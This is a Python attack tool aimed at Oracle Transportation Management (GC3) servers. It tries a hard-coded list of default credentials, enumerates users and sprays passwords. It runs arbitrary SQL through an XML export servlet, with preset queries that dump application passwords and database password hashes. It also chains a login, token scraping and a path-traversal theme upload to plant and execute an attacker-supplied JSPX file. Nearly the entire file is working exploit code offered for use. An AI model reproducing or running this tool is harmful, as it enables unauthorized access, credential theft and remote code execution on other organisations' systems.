import requests
import sys
import urllib3
import argparse
import re
import html
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def myArguments():
    parser = argparse.ArgumentParser()
    parser.add_argument('attktype',help='Attack method ( default, enum, spray, quary, exploit)')
    parser.add_argument('hosts_file',help='List of target URLs')
    parser.add_argument('-u','--users_file',help='List of user names to target')
    parser.add_argument('-su','--sprayuser', help='User name to test')
    parser.add_argument('-q','--query', help='SQL query to run')
    parser.add_argument('-uq','--userquery', help='User to query the SQL')
    parser.add_argument('-pq', '--passquery', help='Password to query the SQL')
    parser.add_argument('-lu','--loginuser', help='User to login')
    parser.add_argument('-lp', '--loginpassword', help='Password to login')
    parser.add_argument('-pf', '--payloadfile', help='Payload file to upload')
    return parser.parse_args()


args = myArguments()

attktype = args.attktype
hosts_file = args.hosts_file
users_file = args.users_file
sprayuser = args.sprayuser
query = args.query
userquery = args.userquery
passquery = args.passquery
loginuser = args.loginuser
loginpassword = args.loginpassword
payloadfile = args.payloadfile


def send_req(url, user, passw):
    scheme = url.split("/")[0]
    hostname = url.split("/")[2]
    if ":" in hostname:
        hostheader = hostname.split(":")[0]
    else:
        hostheader=hostname
    #print('[*] Using '+hostname+' host and '+user+':'+passw+' credentials')
    url = scheme+'//'+hostname+'/GC3/glog.integration.servlet.DBXMLServlet?command=xmlExport'
    headers = {'Host': hostheader,
               "Connection": "close",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101",
               "Content-Type": "text/xml",
               "Accept": "application/xml, text/xml, */*; q=0.01",
               "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "en-US,en;q=0.5",
               'UserName': user,
               'Password': passw
               }
    xml ='<sql2xml><Query><RootName>user_association</RootName><Statement>select 123123123 from dual  </Statement></Query><FootPrint>N</FootPrint><UseLOBElement>N</UseLOBElement></sql2xml>'
    r = requests.post(url, data = xml, headers=headers, verify=False ,timeout=30)

    notexist = f'User {user} not found'
    autherror = "Authentication Failed for user"
    success = "123123123"

    if notexist in r.text:
        print("[-] User does not exists")
        a=1
    elif autherror in r.text:
        print("[-] Authentication failed for user "+user)
        a=1
    elif success in r.text:
        print("[+] Authentication succeeded for user: "+user+ "(host:"+hostname+")")
        return True
    else:
        print("[!] ERROR WHEN ACCESSING USING "+user+" user")
        print(r.text)
        a=1


def check_default(url):
    print("---- Working on "+url+" host ----")
    defaultusers = ["DBA.ADMIN:CHANGEME","DBA.DEFAULT:CHANGEME","SERVPROV.ADMIN:CHANGEME","SERVPROV.DEFAULT:CHANGEME","GUEST.ADMIN:CHANGEME","GUEST.DEFAULT:CHANGEME","GLOG.ADMIN:CHANGEME","GLOG.DEFAULT:CHANGEME","STAGE.ADMIN:CHANGEME","STAGE.DEFAULT:CHANGEME","EBS.ADMIN:CHANGEME","EBS.DEFAULT:CHANGEME","E1.ADMIN:CHANGEME","E1.DEFAULT:CHANGEME","BLUEPRINT.ADMIN:CHANGEME","BLUEPRINT.DEFAULT:CHANGEME","system:CHANGEME","guest:CHANGEME","ebs:ebs","e1:e1","blueprint:blueprint","glog:glog","glogdev:CHANGEME"]
    resultsarray = []
    for user in defaultusers:
        currentuser = user.split(":")[0]
        currentpass = user.split(":")[1]
        if send_req(url, currentuser, currentpass)==True:
            resultsarray.append(currentuser)
    print(resultsarray)


def enum_user(url,enum_file):
    enumfile = open(enum_file, 'r')
    users = enumfile.read().splitlines()

    for user in users:
        send_req(url,user,'fakepass')


def spray(url,user,enum_file):
    print(enum_file)
    enumfile = open(enum_file, 'r')
    passwords = enumfile.read().splitlines()

    for passw in passwords:
        send_req(url,user,passw)

def send_query(url, user, passw,query):
    scheme = url.split("/")[0]
    hostname = url.split("/")[2]
    if ":" in hostname:
        hostheader = hostname.split(":")[0]
    else:
        hostheader=hostname
    print('[*] Using '+hostname+' host and '+user+':'+passw+' credentials')
    url = scheme+'//'+hostname+'/GC3/glog.integration.servlet.DBXMLServlet?command=xmlExport'
    headers = {'Host': hostheader,
               "Connection": "close",
               "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5",
               "Content-Type": "text/xml",
               "Accept": "application/xml, text/xml, */*; q=0.01",
               "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "en-US,en;q=0.5",
               'UserName': user,
               'Password': passw
               }
    xml ='<sql2xml><Query><RootName>user_association</RootName><Statement>'+query+'</Statement></Query><FootPrint>N</FootPrint><UseLOBElement>N</UseLOBElement></sql2xml>'
    r = requests.post(url, data = xml, headers=headers, verify=False)
    print(r.text)

def dologin(url, user, passw):
    scheme = url.split("/")[0]
    hostname = url.split("/")[2]
    if ":" in hostname:
        hostheader = hostname.split(":")[0]
    else:
        hostheader=hostname
    print('[*] Using '+hostname+' host and '+user+':'+passw+' credentials')
    print('[*] Authenticating to '+hostname+' server')
    url = scheme+'//'+hostname+'/GC3/glog.webserver.servlet.umt.Login'
    headers = {'Host': hostheader,
               "Connection": "close",
               "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5",
               "Content-Type": "application/x-www-form-urlencoded",
               "Accept": "application/xml, text/xml, */*; q=0.01",
               "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "en-US,en;q=0.5"
               }
    data ='redir=%2FGC3%2Fglog.webserver.util.FrameGC3Servlet&username='+user+'&userpassword='+passw+'&namespace=GC3&submitbutton=Login&bcKey=&ct='
    r = requests.post(url, data = data, headers=headers, allow_redirects=False, verify=False)
    if r.status_code == 302:
        print('[+] Login succeeded, extracting JSESSIONID cookie...')
        cookie = r.headers['Set-Cookie']
        cookie = cookie.split("; ")
        cookie = cookie[0]
        print('[*] Using '+cookie+' for session')
        exploitparam(url, cookie)
    else:
        print('[-] Authentication failed for user '+user+'...')



def exploitparam(url, cookie):
    scheme = url.split("/")[0]
    hostname = url.split("/")[2]
    if ":" in hostname:
        hostheader = hostname.split(":")[0]
    else:
        hostheader=hostname
    print('[*] Getting upload link variables from themes page ('+hostname+' host)')
    url = scheme+'//'+hostname+'/GC3/glog.webserver.branding.thememanagement.ThemeManagementServlet'
    headers = {'Host': hostheader,
               "Connection": "close",
               "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5",
               "Content-Type": "application/x-www-form-urlencoded",
               "Accept": "application/xml, text/xml, */*; q=0.01",
               "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "en-US,en;q=0.5",
               'Cookie': cookie
               }
    r = requests.get(url, headers=headers, verify=False)
    glogServlet = re.findall(r"var glogServlet.+?(?=;)", r.text)
    breadCrumbsKey = re.findall(r"var breadCrumbsKey.+?(?=;)", r.text)
    ct = re.findall(r"var ct.+?(?=;)", r.text)
    ct = ct[0].split("'")
    ct = str(ct[1].encode('ascii', 'ignore'))
    glogServlet = glogServlet[0].split("'")
    glogServlet = str(glogServlet[1].encode('ascii', 'ignore'))
    breadCrumbsKey = breadCrumbsKey[0].split("'")
    breadCrumbsKey = str(breadCrumbsKey[1].encode('ascii', 'ignore'))
    print('[*] The following upload link variables extracted '+glogServlet+' ,'+breadCrumbsKey+' ,'+ct+' proceeding attack...')
    exploitupload(url, cookie,ct,glogServlet,breadCrumbsKey,payloadfile)


def exploitupload(url, cookie, ct, glog,bckey,payload):
    with open(payload, 'r') as file:
        payloadcontent = file.read().replace('\n', '')
    scheme = url.split("/")[0]
    hostname = url.split("/")[2]
    if ":" in hostname:
        hostheader = hostname.split(":")[0]
    else:
        hostheader=hostname

    print('[*] Extracting traversal path from server properties...')
    propetiesurl = scheme+'//'+hostname+'/GC3/glog.webserver.properties.PropertiesServlet/1621020178354?ct='+ct+'&bcKey='+bckey+'&frame=List'
    propertiesheaders = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,im"
                               "age/webp,*/*;q=0.8",
                     "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
                     "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0",'Cookie': cookie}
    properties = requests.get(propetiesurl, headers=propertiesheaders)
    jspdir = re.findall(r"glog\.custscreens\.jspLocation\=.+?(?=jsp)", properties.text)
    jspdir = jspdir[0].split("$")
    jspdir = jspdir[2]
    jspdir = jspdir.replace('/', '\\')
    jspdir = jspdir+"jsp"
    print('[*] Found injection directory ('+jspdir+')')

    print('[*] Uploading payload to the server... ('+hostname+' host)')
    url = scheme+'//'+hostname+'/GC3/glog.webserver.branding.thememanagement.ThemeManagementServlet/'+glog+'?ct='+ct+'&bcKey='+bckey+'&id=update'
    headers = {'Host': hostheader,
               "Connection": "close",
               "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5",
               "Content-Type": "multipart/form-data; boundary=---------------------------176439097340826088612669123687",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "en-US,en;q=0.5",
               "Content-Length": "4821",
               "Origin ": url,
               "Referer": "http://winserver:7777/GC3/glog.webserver.branding.thememanagement.ThemeManagementServlet/"+glog+"?ct="+ct+"&bcKey="+bckey+"&id=set",
               'Cookie': cookie
               }
    data = "-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"theme_name\"\r\n\r\n\..\..\..\..\.."+jspdir+"\Shipment\SHIPMENT\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"is_new_theme\"\r\n\r\ntrue\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"hidden/uniqueID\"\r\n\r\n5509020834300\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"default_grid_value_Default\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"Default\"\r\n\r\n4\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"set_as_global\"\r\n\r\nfalse\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"carryover_settings\"\r\n\r\nfalse\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"default_grid_value_file/branding_logo_img\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"file/branding_logo_img\"; filename=\"Exploit.jspx\"\r\nContent-Type: application/octet-stream\r\n\r\n  \r\n"+payloadcontent+"\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"default_grid_value_file/home_img\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"file/home_img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"default_grid_value_file/login_img\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"file/login_img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"default_grid_value_text/branding_url\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"text/branding_url\"\r\n\r\nhttp://www.oracle.com\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"translation/branding_title\"\r\n\r\nlabel.LOGISTICS\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"is_picklist_translation/branding_title\"\r\n\r\njoe\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"picklist_allows_vars_translation/branding_title\"\r\n\r\nfalse\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"allow_asterisk_translation/branding_title\"\r\n\r\nfalse\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"dont_validate_translation/branding_title\"\r\n\r\ntrue\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"translation/branding_title@ID\"\r\n\r\nlabel.LOGISTICS\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"query_translation/branding_title\"\r\n\r\nglog.server.query.translation.TranslationQuery\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"management_translation/branding_title\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"listRetriever_translation/branding_title\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"dataSourceContext_translation/branding_title\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"label_translation/branding_title\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"default_grid_value_file/mobile_oraclebanner_img\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"file/mobile_oraclebanner_img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"default_grid_value_file/mobile_otm_img\"\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"file/mobile_otm_img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"bcKey\"\r\n\r\n"+bckey+"\r\n-----------------------------176439097340826088612669123687\r\nContent-Disposition: form-data; name=\"ct\"\r\n\r\n"+ct+"\r\n-----------------------------176439097340826088612669123687--\r\n"
    requests.post(url, headers=headers, data=data)

    print('[*] Calling the uploaded JSPX for exploit')
    exploiturl = scheme+'//'+hostname+'/GC3/ShipmentCustManagement/'+glog+'?ct='+ct+'&bcKey='+bckey+'&generic_stylesheet=jsp:/jsp/Shipment/SHIPMENT/Exploit.jspx&manager_layout_gid=SHIPMENT'
    exploitheaders = {'Host': hostheader,
               "Connection": "close",
               "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "en-US,en;q=0.5",
               "Referer": url+"/GC3/glog.webserver.finder.FinderServlet?ct="+ct+"&query_name=glog.server.query.shipment.BuyShipmentQuery&finder_set_gid=BUY_SHIPMENT",
               'Cookie': cookie
               }
    exploitreq = requests.get(exploiturl, headers=exploitheaders)
    if exploitreq.status_code == 200:
        print('[+] Exploit completed, congrats!')
    elif exploitreq.status_code == 302:
        print('[-] Something went wrong. Looks like a session issue.')
    elif exploitreq.status_code == 403:
        print('[-] 403 response code returned from the server. Probably something with the file path.')


file = open(hosts_file, 'r')
lines = file.read().splitlines()


if attktype == 'enum':
    print('[*] Running in enum mode...')
    for line in lines:
        enum_user(line,users_file)

if attktype == 'default':
    print('[*] Running in default mode...')
    for line in lines:
        check_default(line)

if attktype == 'spray':
    print('[*] Running in spray mode...')
    for line in lines:
        spray(line,sprayuser,users_file)

if attktype == 'exploit':
    print('[*] Running in exploit mode...')
    for line in lines:
        dologin(line,loginuser,loginpassword)

if attktype == 'query':
    print('[*] Running in query mode...')
    if query == 'os':
        query = 'SELECT dbms_utility.port_string FROM DUAL'
    elif query == 'osuser':
        query = 'SELECT SYS_CONTEXT(\'USERENV\',\'OS_USER\') FROM dual'
    elif query == 'hostname':
        query = 'SELECT SYS_CONTEXT(\'USERENV\',\'SERVER_HOST\') FROM dual'
    elif query == 'hostip':
        query = 'SELECT SYS_CONTEXT(\'USERENV\',\'IP_ADDRESS\') FROM dual'
    elif query == 'passwords':
        query = 'SELECT * FROM GL_USER'
    elif query == 'oraversion':
        query= 'SELECT version FROM v$instance'
    elif query == 'dbusershash':
        query = 'SELECT name,spare4 FROM sys.user$'
    elif query == 'dbfileslocation':
        query = 'SELECT name FROM V$DATAFILE'
    for line in lines:
        send_query(line, userquery, passquery,query)






# to fix:
# - u in spray should be list or string.
#clean the response for query